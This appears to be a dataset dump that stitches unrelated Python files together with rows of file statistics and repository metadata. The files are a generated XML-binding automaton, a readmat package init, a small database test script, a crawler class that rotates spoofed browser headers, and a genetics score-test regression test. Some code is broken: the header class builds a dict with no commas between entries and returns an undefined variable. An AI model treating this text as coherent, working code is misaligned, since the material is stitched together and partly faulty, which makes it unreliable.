    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_5._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_4, True) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_4, False) ]))
    st_6._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_5, True) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_5, False) ]))
    st_7._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_6, True) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_6, False) ]))
    st_8._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_7, True) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_7, False) ]))
    st_9._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_8, True) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_8, False) ]))
    st_10._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_12, [
        ]))
    transitions.append(fac.Transition(st_13, [
        ]))
    transitions.append(fac.Transition(st_14, [
        ]))
    transitions.append(fac.Transition(st_15, [
        ]))
    transitions.append(fac.Transition(st_16, [
        ]))
    transitions.append(fac.Transition(st_17, [
        ]))
    st_11._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_9, True) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_9, False) ]))
    st_12._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_10, True) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_10, False) ]))
    st_13._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_11, True) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_11, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_11, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_11, False) ]))
    st_14._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_12, True) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_12, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_12, False) ]))
    st_15._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_13, True) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_13, False) ]))
    st_16._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_14, True) ]))
    st_17._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the automaton to the binding class; the builder deletes itself above.
asiakirjatietoTyyppi._Automaton = _BuildAutomaton_12()
| 58.196499
| 654
| 0.775873
| 25,581
| 249,372
| 7.320433
| 0.023807
| 0.067498
| 0.074248
| 0.099005
| 0.858339
| 0.837273
| 0.833839
| 0.83017
| 0.777672
| 0.768247
| 0
| 0.02645
| 0.11764
| 249,372
| 4,284
| 655
| 58.210084
| 0.824611
| 0.092416
| 0
| 0.746988
| 1
| 0.001854
| 0.127973
| 0.081922
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004634
| false
| 0
| 0.023479
| 0
| 0.163732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
93083a5637c972f2dbb833ec0bfbbe992aa44539
| 242
|
py
|
Python
|
__init__.py
|
AnthonyAndroulakis/mattools
|
d0cad49291bf11af57d78b206d3d265af6179b32
|
[
"WTFPL"
] | 1
|
2019-11-02T03:32:57.000Z
|
2019-11-02T03:32:57.000Z
|
__init__.py
|
AnthonyAndroulakis/mattools
|
d0cad49291bf11af57d78b206d3d265af6179b32
|
[
"WTFPL"
] | null | null | null |
__init__.py
|
AnthonyAndroulakis/mattools
|
d0cad49291bf11af57d78b206d3d265af6179b32
|
[
"WTFPL"
] | null | null | null |
from readmat import readmat
from readmat.readmat import load
from readmat.readmat import mat2obj
from readmat.readmat import mat2dict
from readmat.readmat import options
from readmat.readmat import Struct
from readmat.readmat import loadmat
| 26.888889
| 36
| 0.855372
| 34
| 242
| 6.088235
| 0.264706
| 0.371981
| 0.521739
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00939
| 0.119835
| 242
| 8
| 37
| 30.25
| 0.962441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
93141c1d3031aa72404717475ae15d719c99f4f9
| 342
|
py
|
Python
|
orchestration/test/database/test.py
|
monkey-H/nap-core
|
50d23b0431682f276990db04527deae3b6d84661
|
[
"Apache-2.0"
] | null | null | null |
orchestration/test/database/test.py
|
monkey-H/nap-core
|
50d23b0431682f276990db04527deae3b6d84661
|
[
"Apache-2.0"
] | null | null | null |
orchestration/test/database/test.py
|
monkey-H/nap-core
|
50d23b0431682f276990db04527deae3b6d84661
|
[
"Apache-2.0"
] | null | null | null |
from orchestration.database import database_update
# Ad-hoc smoke check: look up the IP of machine 'web' in cluster 'test'
# for user/project 'mongo' and print it.  Earlier probes kept for reference:
#print database_update.machine_ip('wangwy', 'wangwy', 'cdh', 'slave1')
#print database_update.machine_ip('wangwy', 'wangwy', 'cdh', 'master')
#print database_update.machine_ip('wangwy', 'wangwy', 'cdh', 'cloudera_manager')
# BUG FIX: Python-2-only `print` statement is a SyntaxError on Python 3;
# `print(x)` with a single argument behaves identically on both versions.
print(database_update.machine_ip('mongo', 'mongo', 'test', 'web'))
| 42.75
| 80
| 0.748538
| 43
| 342
| 5.72093
| 0.395349
| 0.284553
| 0.308943
| 0.422764
| 0.638211
| 0.52439
| 0.52439
| 0.52439
| 0
| 0
| 0
| 0.003165
| 0.076023
| 342
| 7
| 81
| 48.857143
| 0.775316
| 0.634503
| 0
| 0
| 0
| 0
| 0.139344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
faad8c08c7a97f3884efa674018fb633dbc58019
| 4,623
|
py
|
Python
|
pyspider/libs/header_switch.py
|
jiangshiyong/pyspider
|
8f7d2a01c43046f7491f95b3fbfffffeaf17192f
|
[
"Apache-2.0"
] | 1
|
2021-09-04T07:11:32.000Z
|
2021-09-04T07:11:32.000Z
|
pyspider/libs/header_switch.py
|
jiangshiyong/pyspider
|
8f7d2a01c43046f7491f95b3fbfffffeaf17192f
|
[
"Apache-2.0"
] | null | null | null |
pyspider/libs/header_switch.py
|
jiangshiyong/pyspider
|
8f7d2a01c43046f7491f95b3fbfffffeaf17192f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Created on 2017-10-18 11:52:26
import random
import time
class HeadersSelector(object):
    """Pool of realistic browser request headers for random rotation.

    The header dicts intentionally lack the Host and Cookie fields;
    callers are expected to fill those in per request.
    """
    headers_1 = {
        "Proxy-Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "DNT": "1",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
        "Referer": "https://www.baidu.com/s?wd=%BC%96%E7%A0%81&rsv_spt=1&rsv_iqid=0x9fcbc99a0000b5d7&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&rqlang=cn&tn=baiduhome_pg&rsv_enter=0&oq=If-None-Match&inputT=7282&rsv_t",
        "Accept-Charset": "gb2312,gbk;q=0.7,utf-8;q=0.7,*;q=0.7",
    }  # browser headers found online
    headers_2 = {
        "Proxy-Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0",
        "Accept": "image/gif,image/x-xbitmap,image/jpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*",
        "DNT": "1",
        "Referer": "https://www.baidu.com/link?url=c-FMHf06-ZPhoRM4tWduhraKXhnSm_RzjXZ-ZTFnPAvZN",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
    }  # Windows 7 browser
    headers_3 = {
        "Proxy-Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
        "Accept": "image/x-xbitmap,image/jpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*",
        "DNT": "1",
        "Referer": "https://www.baidu.com/s?wd=http%B4%20Pragma&rsf=1&rsp=4&f=1&oq=Pragma&tn=baiduhome_pg&ie=utf-8&usm=3&rsv_idx=2&rsv_pq=e9bd5e5000010",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.7,en;q=0.6",
    }  # Linux Firefox browser
    headers_4 = {
        "Proxy-Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "*/*",
        "DNT": "1",
        "Referer": "https://www.baidu.com/link?url=c-FMHf06-ZPhoRM4tWduhraKXhnSm_RzjXZ-ZTFnP",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.7,en;q=0.6",
    }  # Windows 10 Firefox browser
    headers_5 = {
        "Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Referer": "https://www.baidu.com/link?url=c-FMHf06-ZPhoRM4tWduhraKXhnSm_RzjXZ-",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.7,en;q=0.6",
        "Accept-Charset": "gb2312,gbk;q=0.7,utf-8;q=0.7,*;q=0.7",
    }  # Windows 10 Chrome browser
    headers_6 = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.8",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Connection": "keep-alive",
        "DNT": "1",
        "Referer": "https://www.baidu.com/s?wd=If-None-Match&rsv_spt=1&rsv_iqid=0x9fcbc99a0000b5d7&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&rq",
        "Accept-Charset": "gb2312,gbk;q=0.7,utf-8;q=0.7,*;q=0.7",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0",
    }  # Windows 10 browser

    def __init__(self):
        pass

    def select_header(self):
        """Return one of the six header dicts, chosen uniformly at random.

        BUG FIX: the original `switch` dict literal lacked commas between
        entries (SyntaxError) and returned the undefined name `headers1`
        (NameError) instead of `headers`.
        """
        n = random.randint(1, 6)
        switch = {
            1: self.headers_1,
            2: self.headers_2,
            3: self.headers_3,
            4: self.headers_4,
            5: self.headers_5,
            6: self.headers_6,
        }
        headers = switch[n]
        return headers
| 48.663158
| 214
| 0.602639
| 725
| 4,623
| 3.794483
| 0.244138
| 0.022537
| 0.013086
| 0.039258
| 0.740458
| 0.740458
| 0.740458
| 0.719375
| 0.717557
| 0.692475
| 0
| 0.097226
| 0.196842
| 4,623
| 95
| 215
| 48.663158
| 0.643684
| 0.036556
| 0
| 0.458824
| 0
| 0.258824
| 0.669393
| 0.177914
| 0
| 0
| 0.00818
| 0
| 0
| 0
| null | null | 0.011765
| 0.023529
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fabe6ed2189577ffec866765cbf22388c95603a6
| 19,559
|
py
|
Python
|
tests/test_noK_dummy_data.py
|
HealthML/seak
|
6538cb53f8fb73741ece546b1bdc258fa880eaf6
|
[
"Apache-2.0"
] | 2
|
2020-07-15T12:46:44.000Z
|
2020-07-16T12:49:06.000Z
|
tests/test_noK_dummy_data.py
|
HealthML/seak
|
6538cb53f8fb73741ece546b1bdc258fa880eaf6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_noK_dummy_data.py
|
HealthML/seak
|
6538cb53f8fb73741ece546b1bdc258fa880eaf6
|
[
"Apache-2.0"
] | null | null | null |
# Note: all dummy data bim files start at 0 for position, even though file format should be 1-based.
def test_full_rank_continuous():
    """End-to-end regression test: no-kernel (noK) score test on dummy data.

    Loads the dummy VEP/genotype/region/covariate fixtures shipped with
    ``seak``, intersects individuals and variants across the loaders, fits
    the null model, scores every region, and asserts the resulting p-values
    match the stored reference CSV.
    """
    import time
    import numpy as np
    import pandas as pd
    import pkg_resources
    from seak import data_loaders
    from seak import kernels
    from seak import scoretest
    # Fixture directory bundled with the installed seak package.
    data_path = pkg_resources.resource_filename('seak', 'data/')
    # Path to veps
    path_to_VEP_bed = data_path + "dummy_veps.bed"
    path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
    # Path to genotypes
    path_to_covariates = data_path + "dummy_covariates_fixed.csv"
    path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
    # Path to regions
    path_to_reference_genes_bed = data_path + "dummy_regions.bed"
    # Load data
    # VEPs
    hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
                                          hdf5_key='diffscore')
    # Genotypes
    plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
    # Genes
    ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
                                                      chrom_to_load=1, drop_non_numeric_chromosomes=True)
    # Covariates
    covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
                                                            path_to_covariates=path_to_covariates,
                                                            covariate_column_names=['cov1', 'cov2'])
    # Overlap individuals: genotypes and covariates
    print('Overlaps')
    print('Individuals')
    genotypes_covariates_intersection = data_loaders.intersect_ids(plink_loader.get_iids(), covariate_loader_csv.get_iids())
    print(genotypes_covariates_intersection.shape)
    print(genotypes_covariates_intersection)
    # Overlap genotypes with VEPs
    print('Genotypes')
    #print(len(plink_loader.bim.index))
    print(len(hdf5_loader.veps_index_df.index))
    veps_genotypes_intersection = data_loaders.intersect_ids(hdf5_loader.get_vids(), plink_loader.get_vids())
    print(len(veps_genotypes_intersection))
    # Update respective instances so every loader holds the same
    # individual/variant sets before scoring.
    print('Updates')
    #print('plink_loader.bim.shape', plink_loader.bim.shape)
    plink_loader.update_variants(veps_genotypes_intersection)
    #print('plink_loader.bim.shape', plink_loader.bim.shape)
    print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
    hdf5_loader.update_variants(veps_genotypes_intersection)
    print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
    #print('plink_loader.fam.shape', plink_loader.fam.shape)
    plink_loader.update_individuals(genotypes_covariates_intersection)
    #print('plink_loader.fam.shape', plink_loader.fam.shape)
    print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
    covariate_loader_csv.update_individuals(genotypes_covariates_intersection)
    print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
    # Fit the null model (no background kernel) on phenotype + covariates.
    Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
    null_model = scoretest.ScoretestNoK(Y, X)
    results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
    # Score each region: build the (genotype x annotation) kernel and test
    # it against the null model, timing each region.
    for index, region in ucsc_region_loader.regions.iterrows():
        t_test_gene_start = time.time()
        temp_genotypes_info_dict = region.to_dict()
        temp_genotypes, temp_vids = plink_loader.genotypes_by_region(region)
        if temp_genotypes is None:
            continue
        G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
                                                                       normalize=False, invert_encoding=True,
                                                                       recode_maf=False)
        if G is None:
            continue
        V = hdf5_loader.anno_by_id(temp_vids)
        GV = kernels.diffscore_max(G, V, False)
        temp_p_value = null_model.pv_alt_model(GV)
        temp_genotypes_info_dict['p_value'] = temp_p_value
        temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
        t_test_gene_end = time.time()
        temp_time = float(t_test_gene_end - t_test_gene_start)
        temp_genotypes_info_dict['time'] = temp_time
        results = results.append(temp_genotypes_info_dict, ignore_index=True)
    # results.to_csv('./test_full_rank_continuous.csv')
    print(results)
    # Compare against the checked-in reference results; np.isclose guards
    # against harmless floating-point differences.
    reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
    print(np.corrcoef(reference_result['p_value'], results['p_value']))
    print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
    assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
# def test_full_rank_continuous_exclude_individuals():
# import time
#
# import numpy as np
# import pandas as pd
# import pkg_resources
#
# from seak import data_loaders
# from seak import kernels
# from seak import scoretest
#
# data_path = pkg_resources.resource_filename('seak', 'data/')
#
# # Path to veps
# path_to_VEP_bed = data_path + "dummy_veps.bed"
# path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
#
# # Path to genotypes
# path_to_covariates = data_path + "dummy_covariates_fixed.csv"
# path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
#
# # Path to regions
# path_to_reference_genes_bed = data_path + "dummy_regions.bed"
#
# # Load data
# # VEPs
# hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
# hdf5_key='diffscore')
#
# # Genotypes
# plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
#
# # Genes
# ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
# chrom_to_load=1, drop_non_numeric_chromosomes=True)
#
# # Covariates
# covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
# path_to_covariates=path_to_covariates,
# covariate_column_names=['cov1', 'cov2'])
#
# # Exclude individuals
# plink_loader.update_individuals(['test'], exclude=True)
# # Exclude variants
# # plink_loader.update_variants(coordinates={"chrom": '1', "start": 0, "end": 10})
# # print(plink_loader.bim.index)
#
# # Overlap individuals: genotypes and covariates
# print('Overlaps')
# print('Individuals')
# genotypes_covariates_intersection = plink_loader.get_iids().intersection(covariate_loader_csv.get_iids())
#
# print(genotypes_covariates_intersection.shape)
# print(genotypes_covariates_intersection)
#
# # Overlap genotypes with VEPs
# print('Genotypes')
# #print(len(plink_loader.bim.index))
# print(len(hdf5_loader.veps_index_df.index))
# veps_genotypes_intersection = hdf5_loader.veps_index_df.index.intersection(plink_loader.bim.index)
# print(len(veps_genotypes_intersection))
#
# # Update respective instances
# print('Updates')
# #print('plink_loader.bim.shape', plink_loader.bim.shape)
# plink_loader.update_variants(veps_genotypes_intersection)
# #print('plink_loader.bim.shape', plink_loader.bim.shape)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# hdf5_loader.update_variants(veps_genotypes_intersection)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# #print('plink_loader.fam.shape', plink_loader.fam.shape)
# plink_loader.update_individuals(genotypes_covariates_intersection)
# #print('plink_loader.fam.shape', plink_loader.fam.shape)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
# covariate_loader_csv.update_individuals(genotypes_covariates_intersection)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
#
# Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
# null_model = scoretest.ScoretestNoK(Y, X)
# results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
#
# for index, region in ucsc_region_loader.regions.iterrows():
# t_test_gene_start = time.time()
# temp_genotypes_info_dict = region.to_dict()
# temp_genotypes, temp_vids = plink_loader.genotypes_by_region(region)
# if temp_genotypes is None:
# continue
#
# G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
# normalize=False, invert_encoding=True,
# recode_maf=False)
# if G is None:
# continue
#
# V = hdf5_loader.anno_by_id(temp_vids)
#
# GV = kernels.diffscore_max(G, V, False)
# temp_p_value = null_model.pv_alt_model(GV)
# temp_genotypes_info_dict['p_value'] = temp_p_value
# temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
# t_test_gene_end = time.time()
# temp_time = float(t_test_gene_end - t_test_gene_start)
# temp_genotypes_info_dict['time'] = temp_time
# results = results.append(temp_genotypes_info_dict, ignore_index=True)
#
# # results.to_csv('./test_full_rank_continuous.csv')
# print(results)
# reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
# print(np.corrcoef(reference_result['p_value'], results['p_value']))
# print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
# assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
# def test_full_rank_continuous_genotypes_by_id():
# import time
#
# import numpy as np
# import pandas as pd
# import pkg_resources
#
# from seak import data_loaders
# from seak import kernels
# from seak import scoretest
#
# data_path = pkg_resources.resource_filename('seak', 'data/')
#
# # Path to veps
# path_to_VEP_bed = data_path + "dummy_veps.bed"
# path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
#
# # Path to genotypes
# path_to_covariates = data_path + "dummy_covariates_fixed.csv"
# path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
#
# # Path to regions: not needed here, as I test genotype loading by id not region (genes)
# # path_to_reference_genes_bed = data_path + "dummy_regions.bed"
#
# # Load data
# # VEPs
# hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
# hdf5_key='diffscore')
#
# # Genotypes
# plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
#
# # Genes: not needed here, as I test genotype loading by id not region (genes)
# # ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
# # chrom_to_load=1, drop_non_numeric_chromosomes=True)
#
# # Covariates
# covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
# path_to_covariates=path_to_covariates,
# covariate_column_names=['cov1', 'cov2'])
#
# # Overlap individuals: genotypes and covariates
# print('Overlaps')
# print('Individuals')
# # genotypes_covariates_intersection = plink_loader.get_iids().intersection(covariate_loader_csv.get_iids())
# genotypes_covariates_intersection = data_loaders.intersect_ids(plink_loader.get_iids(), covariate_loader_csv.get_iids())
#
# print(genotypes_covariates_intersection.shape)
# print(genotypes_covariates_intersection)
#
# # Overlap genotypes with VEPs
# print('Genotypes')
# # print(len(plink_loader.bim.index))
# print(len(hdf5_loader.veps_index_df.index))
# # veps_genotypes_intersection = hdf5_loader.get_vids().intersection(plink_loader.get_vids())
# veps_genotypes_intersection = data_loaders.intersect_ids(hdf5_loader.get_vids(), plink_loader.get_vids())  # NOTE(review): this line previously intersected individual IDs (get_iids) — a copy-paste from the individuals step above; variant IDs are intended, as in the commented alternative on the preceding line.
# print(len(veps_genotypes_intersection))
#
# # Update respective instances
# print('Updates')
# # print('plink_loader.bim.shape', plink_loader.bim.shape)
# plink_loader.update_variants(veps_genotypes_intersection)
# # print('plink_loader.bim.shape', plink_loader.bim.shape)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# hdf5_loader.update_variants(veps_genotypes_intersection)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# # print('plink_loader.fam.shape', plink_loader.fam.shape)
# plink_loader.update_individuals(genotypes_covariates_intersection)
# # print('plink_loader.fam.shape', plink_loader.fam.shape)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
# covariate_loader_csv.update_individuals(genotypes_covariates_intersection)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
#
# Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
# null_model = scoretest.ScoretestNoK(Y, X)
